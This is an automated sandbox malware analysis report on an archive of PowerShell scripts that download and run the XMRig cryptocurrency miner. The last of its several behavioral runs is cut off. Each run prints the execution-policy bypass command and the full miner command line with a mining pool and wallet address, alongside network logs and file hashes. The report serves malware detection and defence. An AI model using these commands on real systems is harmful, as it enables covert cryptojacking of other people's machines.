Malware Analysis Report

2025-04-19 18:46

Sample ID 240527-ar5shshf3v
Target main2.rar
SHA256 08f3805606e1d457ed9e80b975bee0320651e3d5626e9e7cb896fd45e8fd0f7b
Tags
xmrig execution miner
score
10/10

Analysis Overview

score
10/10

SHA256

08f3805606e1d457ed9e80b975bee0320651e3d5626e9e7cb896fd45e8fd0f7b

Threat Level: Known bad

The file main2.rar was found to be: Known bad.

Malicious Activity Summary

xmrig execution miner

xmrig

XMRig Miner payload

Blocklisted process makes network request

Executes dropped EXE

Command and Scripting Interpreter: PowerShell

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of FindShellTrayWindow

Suspicious behavior: LoadsDriver

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-27 00:27

Signatures

N/A

Analysis: behavioral10

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 03:06

Platform

win10-20240404-en

Max time kernel

1796s

Max time network

1801s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 213.143.182.52.in-addr.arpa udp
US 8.8.8.8:53 200.131.50.23.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pt5k1ken.3mt.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral15

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 03:19

Platform

win10v2004-20240508-en

Max time kernel

1800s

Max time network

1787s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 68.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
CZ 23.212.110.162:443 www.bing.com tcp
US 8.8.8.8:53 162.110.212.23.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 25.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 25.173.189.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_igvesaa2.peo.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral26

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 03:38

Platform

win10-20240404-en

Max time kernel

1799s

Max time network

1760s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 14.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 25.24.18.2.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_apugeo1e.1yu.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 03:04

Platform

win10-20240404-en

Max time kernel

1796s

Max time network

1800s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 52.111.227.14:443 tcp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 10.179.89.13.in-addr.arpa udp
US 8.8.8.8:53 82.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 91.90.14.23.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4pyng0cd.oj5.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral7

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 03:05

Platform

win10v2004-20240426-en

Max time kernel

1798s

Max time network

1798s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 91.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 134.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 82.90.14.23.in-addr.arpa udp
US 52.111.227.11:443 tcp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 15.173.189.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ai2w5ekk.xrs.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral16

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 03:24

Platform

win11-20240426-en

Max time kernel

1796s

Max time network

1793s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lf4cywjg.5bx.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral22

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 03:35

Platform

win10-20240404-en

Max time kernel

1796s

Max time network

1766s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 205.201.50.20.in-addr.arpa udp
US 8.8.8.8:53 25.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_q3xu1ud4.1pj.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral29

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 03:38

Platform

win10v2004-20240508-en

Max time kernel

1792s

Max time network

1797s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

